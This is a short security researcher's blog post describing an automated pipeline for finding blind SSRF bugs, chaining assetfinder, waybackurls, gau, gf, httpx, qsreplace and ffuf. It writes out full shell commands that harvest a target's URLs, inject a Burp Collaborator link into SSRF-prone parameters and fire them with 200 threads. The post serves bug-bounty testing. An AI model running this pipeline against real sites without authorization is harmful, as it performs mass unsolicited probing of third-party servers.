Automation to find Blind SSRF

Hi, everyone

My name is Saumya Agrawal, I’m a security researcher from India. In this article, I will be describing how I was able to Find ssrf vulnerability by automating it.

Tools :
1. Assetfinder : https://github.com/tomnomnom/assetfinder
2. gau : https://github.com/lc/gau
3.waybackurls : https://github.com/tomnomnom/waybackurls
4.Httpx : https://github.com/projectdiscovery/httpx
5.gf : https://github.com/tomnomnom/gf

For the gf tool, u can find patterns here: https://github.com/1ndianl33t/Gf-Patterns

6. qsreplace: https://github.com/tomnomnom/qsreplace
7. FFUF: https://github.com/ffuf/ffuf

Method :

Let's take our target as example.com. Now we will find all the subdomains of our target using assetfinder.

# assetfinder -subs-only example.com | sort -u >>domain.txt

Now we will find all the URLs of the subdomains using waybackurls and using gau we find URLs of domain …

You can also use gau/waybackurls to find URLs of domain and subdomains... It depends on you…

# cat domain.txt | waybackurls >>urls.txt
# gau example.com >> urls.txt (or you can use # waybackurls example.com >>urls.txt)

Now we sort the URLs, remove the repeated once, filter the links which have parameters that may be vulnerable to ssrf, and replace those parameters with the Burp Collaborator link.

# cat urls.txt | sort -u | gf ssrf | httpx -silent | qsreplace “Burp Collaborator Link “ >> blind_ssrf.txt

Finally, we fuzz those URLs using ffuf tool :
# ffuf -c -w blind_ssrf.txt -u FUZZ -t 200

Now check your Burp Collaborator for any ping back ….
If you get any ping back their may ssrf/blind_ssrf ..

Note : The text after # are commands used in the process ( To give them a separate importance i used # before them …

Single comamnd:

# assetfinder -subs-only example.com | sort -u | waybackurls >> urls.txt&& gau example.com >> 1.txt && cat 1.txt | sort -u | gf ssrf | httpx -silent | qsreplace “Burp Collaborator link “ >>ssrf.txt && ffuf -c -w ssrf.txt -u FUZZ -t 200